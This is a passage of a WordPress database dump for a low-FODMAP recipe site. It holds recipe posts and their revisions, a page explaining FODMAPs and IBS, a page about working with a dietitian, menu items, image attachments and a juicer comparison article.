\n','Pasta with super kale pesto','','inherit','closed','closed','','5060-revision-v1','','','2020-04-12 18:33:39','2020-04-12 18:33:39','',5060,'http://tummyrevolution.com/5060-revision-v1/',0,'revision','',0),(5065,1,'2020-04-12 22:15:49','2020-04-12 22:15:49','\n

[vc_row row_content_width=\"grid\"][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"nature\"][/vc_column][/vc_row]

\n','Recipies','','publish','closed','closed','','recipies','','','2020-04-12 22:15:50','2020-04-12 22:15:50','',0,'http://tummyrevolution.com/?page_id=5065',0,'page','',0),(5066,1,'2020-04-12 22:15:49','2020-04-12 22:15:49','\n

[vc_row row_content_width=\"grid\"][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"nature\"][/vc_column][/vc_row]

\n','Recipies','','inherit','closed','closed','','5065-revision-v1','','','2020-04-12 22:15:49','2020-04-12 22:15:49','',5065,'http://tummyrevolution.com/5065-revision-v1/',0,'revision','',0),(5068,1,'2020-04-12 22:46:27','2020-04-12 22:46:27','','Recipe List','','inherit','closed','closed','','3776-revision-v1','','','2020-04-12 22:46:27','2020-04-12 22:46:27','',3776,'http://tummyrevolution.com/3776-revision-v1/',0,'revision','',0),(5070,1,'2020-04-12 23:07:50','2020-04-12 23:07:50','','HOME','','publish','closed','closed','','home-5','','','2020-04-22 22:36:44','2020-04-22 22:36:44','',0,'http://tummyrevolution.com/home-5/',1,'nav_menu_item','',0),(5074,1,'2020-04-12 23:20:09','2020-04-12 23:20:09','\n
\"\"/
\n\n\n\n

Our gut health play a much more important role to our wellbeing than many think.  When our guts are not working well, the whole body and mind is affected. 

\n\n\n\n

Doctors have been able to diagnose digestive disorders for years but have not been able to provide much in terms of a cure.  It’s only in recent years, that ground breaking research has proven that one solution, lies in the food we eat!

\n\n\n\n

Research conducted by Monash University, in Melbourne Australia, in the early 2000\'s, indicated that certain small carbohydrates in our food were connected to symptoms associated with digestive disorders, such as IBS. These carbohydrates can be divided into groups and named FODMAP’s, which is an acronym for:

\n\n\n\n

Fermentable, Oligosaccharides, Disaccharides, Monosaccharides and Polyols.
It might sound complicated but they are simply fermentable carbohydrates found naturally in the foods we eat.

\n\n\n\n

These carbohydrates (FODMAPs) are not absorbed properly in the small intestine. So when they reach the large intestine the billions of bacteria that naturally line the gut start fermenting the FODMAPs. All of this is perfectly natural and most people don’t have trouble with the amounts of FODMAPs encountered in a typical diet. However, people with a sensitive or damaged gut seem to have a lower tolerance for some of these FODMAPs and the fermentation process results in excessive gas production which causes the familiar symptoms of wind, bloating and discomfort. Also, an osmotic effect occurs where the large intestine either looses or retains too much water. This can cause the symptoms of loose stools or diarrhoea and in other sufferers, constipation. When you increase your intake of FODMAPs your symptoms will also increase.

\n\n\n\n
\"\"/
\n\n\n\n

The research showed that individuals with IBS felt better when they minimised FODMAP’s in their diet; as a result, the low-FODMAP diet was developed.  The low FODMAP diet is not only limited to IBS sufferers.  It has also been shown to improve gut symptoms in people with gluten sensitivity, intestinal inflammation and inflammatory bowel disease. It is now recognised, worldwide, as the number one treatment for IBS and related gastric problems.

\n\n\n\n

The good news is that the low-FODMAP diet is a temporary diet and not a diet for life. It is a method of finding out what triggers your digestive problems so that you can alter and customise your diet according to your own needs. The likelihood is that only a few FODMAPs cause you problems, rather than all.

\n','science','','publish','closed','closed','','science','','','2020-04-12 23:20:10','2020-04-12 23:20:10','',0,'http://tummyrevolution.com/?page_id=5074',0,'page','',0),(5075,1,'2020-04-12 23:20:09','2020-04-12 23:20:09','\n
\"\"/
\n\n\n\n

Our gut health play a much more important role to our wellbeing than many think.  When our guts are not working well, the whole body and mind is affected. 

\n\n\n\n

Doctors have been able to diagnose digestive disorders for years but have not been able to provide much in terms of a cure.  It’s only in recent years, that ground breaking research has proven that one solution, lies in the food we eat!

\n\n\n\n

Research conducted by Monash University, in Melbourne Australia, in the early 2000\'s, indicated that certain small carbohydrates in our food were connected to symptoms associated with digestive disorders, such as IBS. These carbohydrates can be divided into groups and named FODMAP’s, which is an acronym for:

\n\n\n\n

Fermentable, Oligosaccharides, Disaccharides, Monosaccharides and Polyols.
It might sound complicated but they are simply fermentable carbohydrates found naturally in the foods we eat.

\n\n\n\n

These carbohydrates (FODMAPs) are not absorbed properly in the small intestine. So when they reach the large intestine the billions of bacteria that naturally line the gut start fermenting the FODMAPs. All of this is perfectly natural and most people don’t have trouble with the amounts of FODMAPs encountered in a typical diet. However, people with a sensitive or damaged gut seem to have a lower tolerance for some of these FODMAPs and the fermentation process results in excessive gas production which causes the familiar symptoms of wind, bloating and discomfort. Also, an osmotic effect occurs where the large intestine either looses or retains too much water. This can cause the symptoms of loose stools or diarrhoea and in other sufferers, constipation. When you increase your intake of FODMAPs your symptoms will also increase.

\n\n\n\n
\"\"/
\n\n\n\n

The research showed that individuals with IBS felt better when they minimised FODMAP’s in their diet; as a result, the low-FODMAP diet was developed.  The low FODMAP diet is not only limited to IBS sufferers.  It has also been shown to improve gut symptoms in people with gluten sensitivity, intestinal inflammation and inflammatory bowel disease. It is now recognised, worldwide, as the number one treatment for IBS and related gastric problems.

\n\n\n\n

The good news is that the low-FODMAP diet is a temporary diet and not a diet for life. It is a method of finding out what triggers your digestive problems so that you can alter and customise your diet according to your own needs. The likelihood is that only a few FODMAPs cause you problems, rather than all.

\n','science','','inherit','closed','closed','','5074-revision-v1','','','2020-04-12 23:20:09','2020-04-12 23:20:09','',5074,'http://tummyrevolution.com/5074-revision-v1/',0,'revision','',0),(5079,1,'2020-04-12 23:25:04','2020-04-12 23:25:04','','FREE RESOURCES','','publish','closed','closed','','free-resources','','','2020-04-22 20:25:57','2020-04-22 20:25:57','',0,'http://tummyrevolution.com/free-resources/',1,'nav_menu_item','',0),(5091,1,'2020-04-12 23:33:12','2020-04-12 23:33:12','','RECIPES','','publish','closed','closed','','recipe-2','','','2020-04-20 02:02:38','2020-04-20 02:02:38','',0,'http://tummyrevolution.com/recipe-2/',2,'nav_menu_item','',0),(5097,1,'2020-04-12 23:42:14','2020-04-12 23:42:14','','ABOUT','','publish','closed','closed','','about-2','','','2020-04-22 20:25:57','2020-04-22 20:25:57','',0,'http://tummyrevolution.com/about-2/',3,'nav_menu_item','',0),(5099,1,'2020-04-12 23:45:20','2020-04-12 23:45:20','','ABOUT','','publish','closed','closed','','about','','','2020-04-22 22:36:44','2020-04-22 22:36:44','',0,'http://tummyrevolution.com/about/',2,'nav_menu_item','',0),(5100,1,'2020-04-12 23:45:20','2020-04-12 23:45:20','','RECIPES','','publish','closed','closed','','recipe-5','','','2020-04-22 22:36:44','2020-04-22 22:36:44','',0,'http://tummyrevolution.com/recipe-5/',3,'nav_menu_item','',0),(5104,1,'2020-04-12 23:48:21','2020-04-12 23:48:21','\n
\"\"/
\n\n\n\n

Because the low-FODMAP diet is a medical diet it is always recommend that you work with a  FODMAP trained dietitian if you decide to follow the low FODMAP diet. A trained dietitian can work together with you to develop a specific plan tailored around your individual needs.

\n\n\n\n

I work closely together with Debra Thomas who is a Registered Dietitian with the Health Care Professions Council, a member of the British Dietetic Association and a listed member of the BDA’s Freelance Dietitians Group.

\n\n\n\n

As a Nutrition Consultant and Advanced Practitioner, she has over 18 years’ experience of advising on a range of therapeutic diets, but her specialism is the treatment of irritable bowel syndrome (IBS). She has been certified by King’s College London, to deliver tailor-made advice on the low FODMAP diet as an effective treatment for IBS. She\'s worked for many years in the NHS in the UK and she\'s also the founder of FODMAP Consultancy. For more information about Debra and FODMAP Consultancy visit her website  https://www.fodmapconsultancy.com

\n','Working with a Dietitian','','inherit','closed','closed','','4890-revision-v1','','','2020-04-12 23:48:21','2020-04-12 23:48:21','',4890,'http://tummyrevolution.com/4890-revision-v1/',0,'revision','',0),(5106,1,'2020-04-13 00:56:38','2020-04-13 00:56:38','[vc_row row_content_width=\"grid\"][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"recipes\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-13 00:56:38','2020-04-13 00:56:38','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5107,1,'2020-04-13 01:00:58','2020-04-13 01:00:58','[vc_row row_content_width=\"grid\"][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"recipes\"][/vc_column][/vc_row][vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"ASC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"recipes\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-13 01:00:58','2020-04-13 01:00:58','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5108,1,'2020-04-13 01:01:37','2020-04-13 01:01:37','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"ASC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\" category=\"recipes\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-13 01:01:37','2020-04-13 01:01:37','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5109,1,'2020-04-13 01:01:59','2020-04-13 01:01:59','','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-13 01:01:59','2020-04-13 01:01:59','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5110,1,'2020-04-13 01:03:53','2020-04-13 01:03:53','[vc_row][vc_column][qodef_blog_slider orderby=\"date\" order=\"DESC\" image_size=\"full\" post_info_category=\"yes\" post_info_comments=\"no\" number_of_posts=\"6\"][/vc_column][/vc_row]','Recipes Home','','inherit','closed','closed','','1117-revision-v1','','','2020-04-13 01:03:53','2020-04-13 01:03:53','',1117,'http://tummyrevolution.com/1117-revision-v1/',0,'revision','',0),(5111,1,'2020-04-13 01:27:56','2020-04-13 01:27:56','','orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x','','inherit','open','closed','','orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x','','','2020-04-13 01:27:56','2020-04-13 01:27:56','',4674,'http://tummyrevolution.com/wp-content/uploads/2020/04/orange_ginger_mint_tea_cea8bec3-e587-41d4-9b38-d378b83eeaf5_880x.jpg',0,'attachment','image/jpeg',0),(5112,1,'2020-04-13 01:46:19','2020-04-13 01:46:19','','untitled','','inherit','open','closed','','untitled','','','2020-04-13 01:46:19','2020-04-13 01:46:19','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/untitled.png',0,'attachment','image/png',0),(5125,1,'2020-04-12 03:41:00','2020-04-12 03:41:00','\n

Flavour infused water is a good substitute for sugary drinks and a great way to rehydrate. Here are two gently infused water recipes that your tummy will enjoy. You can make flavoured water in a few minutes and keep in the fridge for 2-3 days. They can also be topped up once you’ve finished the water. 

\n\n\n\n

Makes 1 jug of each flavour

\n\n\n\n

FOR THE CUCUMBER & LEMONGRASS WATER

\n\n\n\n

½ cucumber

\n\n\n\n

2 stalks lemongrass

\n\n\n\n

4 cups (approx 1 litre) of water

\n\n\n\n

Ice

\n\n\n\n

FOR THE PINEAPPLE & MINT WATER

\n\n\n\n

1 cup (225g) chopped pineapple

\n\n\n\n

5 sprigs of mint
\n4 cups (approx. 1 litre) of water

\n\n\n\n

Ice

\n\n\n\n

MAKING THE CUCUMBER & LEMONGRASS WATER

\n\n\n\n

1. Wash and peel the cucumber length way into ribbons.

\n\n\n\n

2. Peel away the rough outer edge of the lemongrass. Cut the lemongrass in half, lengthwise. Place the lemongrass onto a cutting board. Using a rolling pin, gently smash the lemongrass. Add to the jug with the cucumber ribbons.

\n\n\n\n

3. Fill with water. Give it a stir and chill in the fridge at least an hour.  Add ice and serve.

\n\n\n\n

MAKING THE PINEAPPLE & MINT WATER

\n\n\n\n

1. Place the chopped pineapple in a jug.

\n\n\n\n

2. Break  up all of the mint leaves apart from one sprig. Place the mint in the jug and finally the mint sprig. 

\n\n\n\n

3. Fill with water. Give it a stir and chill in the fridge for at least an hour. Add ice and serve.

\n\n\n\n

Tip
You can swap the fruit you put into the water by using fruit from the green part of the traffic light table.

\n\n\n\n
\"\"
\n\n\n\n


\n\n\n\n


\n','Lightly flavoured fruit and herb water','','publish','open','open','','lightly-flavoured-water','','','2020-04-19 06:28:16','2020-04-19 06:28:16','',0,'http://tummyrevolution.com/?p=5125',0,'post','',0),(5126,1,'2020-04-13 07:24:51','2020-04-13 07:24:51','\n

Flavour infused water is a good substitute for sugary drinks and a great way to rehydrate. Here are two gently infused water recipes that your tummy will enjoy. You can make flavoured water in a few minutes and keep in the fridge for 2-3 days. They can also be topped up once you’ve finished the water. 

\n\n\n\n

Makes 1 jug of each flavour

\n\n\n\n

FOR THE CUCUMBER & LEMONGRASS WATER

\n\n\n\n

½ cucumber

\n\n\n\n

2 stalks lemongrass

\n\n\n\n

4 cups (approx 1 litre) of water

\n\n\n\n

Ice

\n\n\n\n

FOR THE PINEAPPLE & MINT WATER

\n\n\n\n

1 cup (225g) chopped pineapple

\n\n\n\n

5 sprigs of mint
\n4 cups (approx. 1 litre) of water

\n\n\n\n

Ice

\n\n\n\n

MAKING THE CUCUMBER & LEMONGRASS WATER

\n\n\n\n

1. Wash and peel the cucumber length way into ribbons.

\n\n\n\n

2. Peel away the rough outer edge of the lemongrass. Cut the lemongrass in half, lengthwise. Place the lemongrass onto a cutting board. Using a rolling pin, gently smash the lemongrass. Add to the jug with the cucumber ribbons.

\n\n\n\n

3. Fill with water. Give it a stir and chill in the fridge at least an hour.  Add ice and serve.

\n\n\n\n

MAKING THE PINEAPPLE & MINT WATER

\n\n\n\n

1. Place the chopped pineapple in a jug.

\n\n\n\n

2. Break  up all of the mint leaves apart from one sprig. Place the mint in the jug and finally the mint sprig. 

\n\n\n\n

3. Fill with water. Give it a stir and chill in the fridge for at least an hour. Add ice and serve.

\n\n\n\n

Tip
You can swap the fruit you put into the water by using fruit from the green part of the traffic light table.

\n\n\n\n
\"\"
\n\n\n\n


\n\n\n\n


\n','Lightly flavoured water','','inherit','closed','closed','','5125-revision-v1','','','2020-04-13 07:24:51','2020-04-13 07:24:51','',5125,'http://tummyrevolution.com/5125-revision-v1/',0,'revision','',0),(5127,1,'2020-04-13 07:31:56','2020-04-13 07:31:56','\n

Flavour infused water is a good substitute for sugary drinks and a great way to rehydrate. Here are two gently infused water recipes that your tummy will enjoy. You can make flavoured water in a few minutes and keep in the fridge for 2-3 days. They can also be topped up once you’ve finished the water. 

\n\n\n\n

Makes 1 jug of each flavour

\n\n\n\n

FOR THE CUCUMBER & LEMONGRASS WATER

\n\n\n\n

½ cucumber

\n\n\n\n

2 stalks lemongrass

\n\n\n\n

4 cups (approx 1 litre) of water

\n\n\n\n

Ice

\n\n\n\n

FOR THE PINEAPPLE & MINT WATER

\n\n\n\n

1 cup (225g) chopped pineapple

\n\n\n\n

5 sprigs of mint
\n4 cups (approx. 1 litre) of water

\n\n\n\n

Ice

\n\n\n\n

MAKING THE CUCUMBER & LEMONGRASS WATER

\n\n\n\n

1. Wash and peel the cucumber length way into ribbons.

\n\n\n\n

2. Peel away the rough outer edge of the lemongrass. Cut the lemongrass in half, lengthwise. Place the lemongrass onto a cutting board. Using a rolling pin, gently smash the lemongrass. Add to the jug with the cucumber ribbons.

\n\n\n\n

3. Fill with water. Give it a stir and chill in the fridge at least an hour.  Add ice and serve.

\n\n\n\n

MAKING THE PINEAPPLE & MINT WATER

\n\n\n\n

1. Place the chopped pineapple in a jug.

\n\n\n\n

2. Break  up all of the mint leaves apart from one sprig. Place the mint in the jug and finally the mint sprig. 

\n\n\n\n

3. Fill with water. Give it a stir and chill in the fridge for at least an hour. Add ice and serve.

\n\n\n\n

Tip
You can swap the fruit you put into the water by using fruit from the green part of the traffic light table.

\n\n\n\n
\"\"
\n\n\n\n


\n\n\n\n


\n','Lightly flavoured water','','inherit','closed','closed','','5125-revision-v1','','','2020-04-13 07:31:56','2020-04-13 07:31:56','',5125,'http://tummyrevolution.com/5125-revision-v1/',0,'revision','',0),(5128,1,'2020-04-13 09:00:29','2020-04-13 09:00:29','\n

\n\n\n\n

Pasta and pesto is a healthy quick meals that’s perfect for busy days in the week when you’re short of time. Made with kale, this version boasts great flavour. Kale is also a nutrient dense food full of antioxidants, vitamins and minerals.

\n\n\n\n
\"\"
\n\n\n\n

Makes 1-2 Serving

\n\n\n\n

INGREDIENTS

\n\n\n\n

2 cups (200g) gluten free spaghetti, gluten free pasta of choice or courgetti

\n\n\n\n

1/3 cup (85g) pine nuts, toasted
(Alternatively you can swap the pine nuts for walnuts)

\n\n\n\n

2 cups (85g) kale

\n\n\n\n

2/3 cup (85g) Parmesan (grated) and a little more for serving

\n\n\n\n

1/3 cup (75ml) extra virgin olive oil

\n\n\n\n

1/3 cup (75ml) garlic infused olive oil

\n\n\n\n

Juice of ½ lemon

\n\n\n\n

INSTRUCTIONS

\n\n\n\n

1. Bring a large pan of water to boil over high heat. Add the pasta and cook according to package instructions until \'al dente\'.

\n\n\n\n

2. Whilst the pasta is cooking, add the pine nuts or walnuts to a frying pan (no oil needed) and toast on medium heat for a few minutes until golden brown. Put a few pine nuts or walnuts aside for garnish when serving.  

\n\n\n\n

2. Put the rest of the pine nuts, Parmesan, garlic, oils, kale and lemon juice in a food processor and whizz to a smooth paste.

\n\n\n\n

4. Drain the pasta and place in a serving dish. 

\n\n\n\n

3. Stir 2-3 tablespoons of pesto through the pasta and top it with the remaining pine nuts or walnuts and some Parmesan. 

\n\n\n\n

4. Put the remaining pesto in an airtight container or jar adding a little bit of extra olive oil to cover the surface. It will keep in the fridge for up to a week or you can freeze it for up to a month.

\n\n\n\n
\"\"
\n','Pasta with super kale pesto','','inherit','closed','closed','','5060-revision-v1','','','2020-04-13 09:00:29','2020-04-13 09:00:29','',5060,'http://tummyrevolution.com/5060-revision-v1/',0,'revision','',0),(5130,1,'2020-04-13 09:38:44','2020-04-13 09:38:44','','smoothie1','','inherit','open','closed','','smoothie1','','','2020-04-13 09:38:44','2020-04-13 09:38:44','',4819,'http://tummyrevolution.com/wp-content/uploads/2020/04/smoothie1.jpg',0,'attachment','image/jpeg',0),(5131,1,'2020-04-13 09:39:07','2020-04-13 09:39:07','','smoothie-Noah','','inherit','open','closed','','smoothie-noah','','','2020-04-13 09:39:07','2020-04-13 09:39:07','',4819,'http://tummyrevolution.com/wp-content/uploads/2020/04/smoothie-Noah.jpg',0,'attachment','image/jpeg',0),(5133,1,'2020-04-13 09:40:21','2020-04-13 09:40:21','\n

We thought we\'d share this delicious green smoothie as we know there are still some people out there who boycott them, hahaa. The green colour makes us think it won\'t be nice but trust us mixed with the right ingredients it can taste amazing - like this one!

On the low-FODMAP diet you should only have one serving of fruit per meal so this healthy green smoothie is much better then an all fruit version.

This smoothie has 2 servings of fruit but it makes two glasses so you can either share (which we like) or keep one covered in the fridge for another meal or the next day.

To make this you\'ll need a smoothie maker like a Nutribullet or similar.

\n\n\n\n
\"\"
\n\n\n\n

Makes two glasses

Ingredients
One large handful of spinach
1/2 banana
1/2 cup of chopped pineapple chunks
1/2 teaspoon chia seeds
1 teaspoon of sunflower seeds and/or pumpkin seeds
150ml almond milk (2/3 cup)
1 vanilla pod (seeds of)
A splash of maple syrup (optional)
Ice

Place all the ingredients into the smoothie mixer and mix until smooth. Serve in your favourite cup/glass and enjoy!

\n\n\n\n
\"\"
\n','Our favourite green smoothie','','inherit','closed','closed','','4819-revision-v1','','','2020-04-13 09:40:21','2020-04-13 09:40:21','',4819,'http://tummyrevolution.com/4819-revision-v1/',0,'revision','',0),(5134,1,'2020-04-12 03:20:00','2020-04-12 03:20:00','\n

Protein-rich eggs are a great way to start your day.  If you can, treat yourself to free range and organic eggs.  Free range hens that eat a healthy, natural diet pass on the benefits to you in the form of more nutritious and delicious eggs.   

\n\n\n\n

Makes 1 serving

INGREDIENTS

2 eggs

1 slice of wheat or gluten free bread

1 tsp butter

INSTRUCTIONS

\n\n\n\n

1. Half fill a saucepan with water and bring it to a boil, then reduce to a simmer.

\n\n\n\n

2. Gently lower the eggs into the water one at a time and cook for 5 -7 minutes (5 minutes for a very runny yolk).

\n\n\n\n

3. In the meantime, pop your bread in the toaster.

\n\n\n\n

4. Remove the eggs and run under cold water for 30 seconds.

\n\n\n\n

5. To remove the cap, use the edge of a knife and gently tap around the top.

\n\n\n\n

Eat straight away with your slice of buttered toast!

\n\n\n\n
\"\"/
\n\n\n\n


\n','Dippy Egg','','publish','open','open','','dippy-egg','','','2020-04-13 10:06:00','2020-04-13 10:06:00','',0,'http://tummyrevolution.com/?p=5134',0,'post','',0),(5135,1,'2020-04-13 09:57:43','2020-04-13 09:57:43','','dippyegg','','inherit','open','closed','','dippyegg','','','2020-04-13 09:57:43','2020-04-13 09:57:43','',5134,'http://tummyrevolution.com/wp-content/uploads/2020/04/dippyegg.jpg',0,'attachment','image/jpeg',0),(5136,1,'2020-04-13 10:05:59','2020-04-13 10:05:59','\n

Protein-rich eggs are a great way to start your day.  If you can, treat yourself to free range and organic eggs.  Free range hens that eat a healthy, natural diet pass on the benefits to you in the form of more nutritious and delicious eggs.   

\n\n\n\n

Makes 1 serving

INGREDIENTS

2 eggs

1 slice of wheat or gluten free bread

1 tsp butter

INSTRUCTIONS

\n\n\n\n

1. Half fill a saucepan with water and bring it to a boil, then reduce to a simmer.

\n\n\n\n

2. Gently lower the eggs into the water one at a time and cook for 5 -7 minutes (5 minutes for a very runny yolk).

\n\n\n\n

3. In the meantime, pop your bread in the toaster.

\n\n\n\n

4. Remove the eggs and run under cold water for 30 seconds.

\n\n\n\n

5. To remove the cap, use the edge of a knife and gently tap around the top.

\n\n\n\n

Eat straight away with your slice of buttered toast!

\n\n\n\n
\"\"/
\n\n\n\n


\n','Dippy Egg','','inherit','closed','closed','','5134-revision-v1','','','2020-04-13 10:05:59','2020-04-13 10:05:59','',5134,'http://tummyrevolution.com/5134-revision-v1/',0,'revision','',0),(5647,1,'2023-10-07 05:55:14','2023-10-07 05:55:14','\n

Juicing has gained popularity as a convenient way to nourish your body with a burst of vitamins and minerals from fruits and vegetables. However, with a variety of juicer options available on the market, it can be overwhelming to decide which one suits your needs best. In this article, we\'ll compare some of the top juicer models, highlighting their features and benefits to help you make an informed decision.

\n\n\n\n

1. Centrifugal Juicers:

\n\n\n\n

Centrifugal juicers are known for their speed and efficiency in extracting juice from fruits and vegetables. They work by using sharp blades to chop the produce and then centrifugal force to separate the juice from the pulp. These juicers are great for busy individuals who want quick and easy juicing.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Fast juicing process.
  • \n\n\n\n
  • Generally more affordable.
  • \n\n\n\n
  • Suitable for hard fruits and vegetables.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Can produce heat that might degrade enzymes and nutrients.
  • \n\n\n\n
  • Less efficient at extracting juice from leafy greens.
  • \n\n\n\n
  • Juice might have more pulp.
  • \n
\n\n\n\n

Recommended Model: Breville JE98XL Juice Fountain Plus

\n\n\n\n\"\"\n\n\n\n

2. Masticating Juicers (Slow Juicers):

\n\n\n\n

Masticating juicers use a slow, grinding process to extract juice from produce. They gently crush and squeeze fruits and vegetables, preserving more nutrients and enzymes. These juicers are ideal for those who prioritize nutrient retention and want to juice a variety of ingredients, including leafy greens.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Higher nutrient retention due to slower juicing process.
  • \n\n\n\n
  • Effective at juicing leafy greens and wheatgrass.
  • \n\n\n\n
  • Less oxidation, resulting in longer shelf life for juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Slower juicing process.
  • \n\n\n\n
  • Generally more expensive.
  • \n\n\n\n
  • Smaller feed chute might require more prep time.
  • \n
\n\n\n\n

Recommended Model: Omega NC900HDC Nutrition Center Juicer

\n\n\n\n

3. Twin Gear Juicers:

\n\n\n\n

Twin gear juicers use two interlocking gears to crush and press fruits and vegetables, extracting juice efficiently. These juicers are often used by serious juicing enthusiasts who want the highest nutrient yield from a wide variety of produce.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Maximum nutrient extraction due to dual gears.
  • \n\n\n\n
  • Effective at juicing leafy greens, wheatgrass, and herbs.
  • \n\n\n\n
  • Minimal oxidation for longer-lasting juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • More complex setup and cleaning process.
  • \n\n\n\n
  • Typically more expensive.
  • \n
\n\n\n\n

Recommended Model: Green Star Elite GSE-5000

\n\n\n\n

4. Citrus Juicers:

\n\n\n\n

As the name suggests, citrus juicers are designed specifically for citrus fruits like oranges, lemons, and grapefruits. They come in manual and electric versions and are perfect for individuals who primarily juice citrus fruits.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Designed for specific fruits.
  • \n\n\n\n
  • Easy to use and clean.
  • \n\n\n\n
  • Electric models can be quick and efficient.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Limited to citrus fruits.
  • \n\n\n\n
  • Manual models require physical effort.
  • \n
\n\n\n\n

Recommended Model: Cuisinart CCJ-500 Pulp Control Citrus Juicer

\n\n\n\n

Conclusion

\n\n\n\n

The best juicer for you depends on your preferences, budget, and the types of produce you plan to juice. Centrifugal juicers offer speed and convenience, masticating juicers prioritize nutrient retention, twin gear juicers provide maximum yield, and citrus juicers are specialized for specific fruits. Before making a decision, consider factors like juicing speed, ease of cleaning, versatility, and the types of fruits and vegetables you want to juice. Whichever model you choose, the key is to enjoy the benefits of fresh, nutrient-rich juices as part of your healthy lifestyle.

\n','Title: Choosing the Best Juicer: A Comparison of Top Models','','inherit','closed','closed','','5537-revision-v1','','','2023-10-07 05:55:14','2023-10-07 05:55:14','',5537,'https://tummyrevolution.com/?p=5647',0,'revision','',0),(5138,1,'2020-04-13 10:53:10','2020-04-13 10:53:10','','Jamjar for new website','','inherit','open','closed','','jamjar-for-new-website','','','2020-04-13 10:53:10','2020-04-13 10:53:10','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Jamjar-for-new-website.jpg',0,'attachment','image/jpeg',0),(5139,1,'2020-04-13 10:53:14','2020-04-13 10:53:14','','Jamjar pumpkin and feta salad','','inherit','open','closed','','jamjar-pumpkin-and-feta-salad','','','2020-04-13 10:53:14','2020-04-13 10:53:14','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Jamjar-pumpkin-and-feta-salad.jpg',0,'attachment','image/jpeg',0),(5140,1,'2020-04-13 10:53:21','2020-04-13 10:53:21','','Jamjar Salads','','inherit','open','closed','','jamjar-salads','','','2020-04-13 10:53:21','2020-04-13 10:53:21','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Jamjar-Salads.jpg',0,'attachment','image/jpeg',0),(5141,1,'2020-04-13 10:53:31','2020-04-13 10:53:31','','Jamjar Salads2','','inherit','open','closed','','jamjar-salads2','','','2020-04-13 10:53:31','2020-04-13 10:53:31','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Jamjar-Salads2.jpg',0,'attachment','image/jpeg',0),(5142,1,'2020-04-13 10:53:37','2020-04-13 10:53:37','','Jamjar smoked salmon salad','','inherit','open','closed','','jamjar-smoked-salmon-salad','','','2020-04-13 10:53:37','2020-04-13 10:53:37','',0,'http://tummyrevolution.com/wp-content/uploads/2020/04/Jamjar-smoked-salmon-salad.jpg',0,'attachment','image/jpeg',0),(5649,1,'2023-10-07 06:04:14','2023-10-07 06:04:14','\n

Juicing has gained popularity as a convenient way to nourish your body with a burst of vitamins and minerals from fruits and vegetables. However, with a variety of juicer options available on the market, it can be overwhelming to decide which one suits your needs best. In this article, we\'ll compare some of the top juicer models, highlighting their features and benefits to help you make an informed decision.

\n\n\n\n

1. Centrifugal Juicers:

\n\n\n\n

Centrifugal juicers are known for their speed and efficiency in extracting juice from fruits and vegetables. They work by using sharp blades to chop the produce and then centrifugal force to separate the juice from the pulp. These juicers are great for busy individuals who want quick and easy juicing.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Fast juicing process.
  • \n\n\n\n
  • Generally more affordable.
  • \n\n\n\n
  • Suitable for hard fruits and vegetables.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Can produce heat that might degrade enzymes and nutrients.
  • \n\n\n\n
  • Less efficient at extracting juice from leafy greens.
  • \n\n\n\n
  • Juice might have more pulp.
  • \n
\n\n\n\n

Recommended Model: Breville JE98XL Juice Fountain Plus

\n\n\n\n\"\"\n\n\n\n

2. Masticating Juicers (Slow Juicers):

\n\n\n\n

Masticating juicers use a slow, grinding process to extract juice from produce. They gently crush and squeeze fruits and vegetables, preserving more nutrients and enzymes. These juicers are ideal for those who prioritize nutrient retention and want to juice a variety of ingredients, including leafy greens.

\n\n\n\n

Pros:

\n\n\n\n
    \n
  • Higher nutrient retention due to slower juicing process.
  • \n\n\n\n
  • Effective at juicing leafy greens and wheatgrass.
  • \n\n\n\n
  • Less oxidation, resulting in longer shelf life for juices.
  • \n
\n\n\n\n

Cons:

\n\n\n\n
    \n
  • Slower juicing process.
  • \n\n\n\n
  • Generally more expensive.
  • \n\n\n\n
  • Smaller feed chute might require more prep time.
  • \n
\n\n\n\n

Recommended Model: Omega NC900HDC Nutrition Center Juicer

\n\n\n\n\"\"\n\n\n\n

3. Twin Gear Juicers:

\n\n\n\n

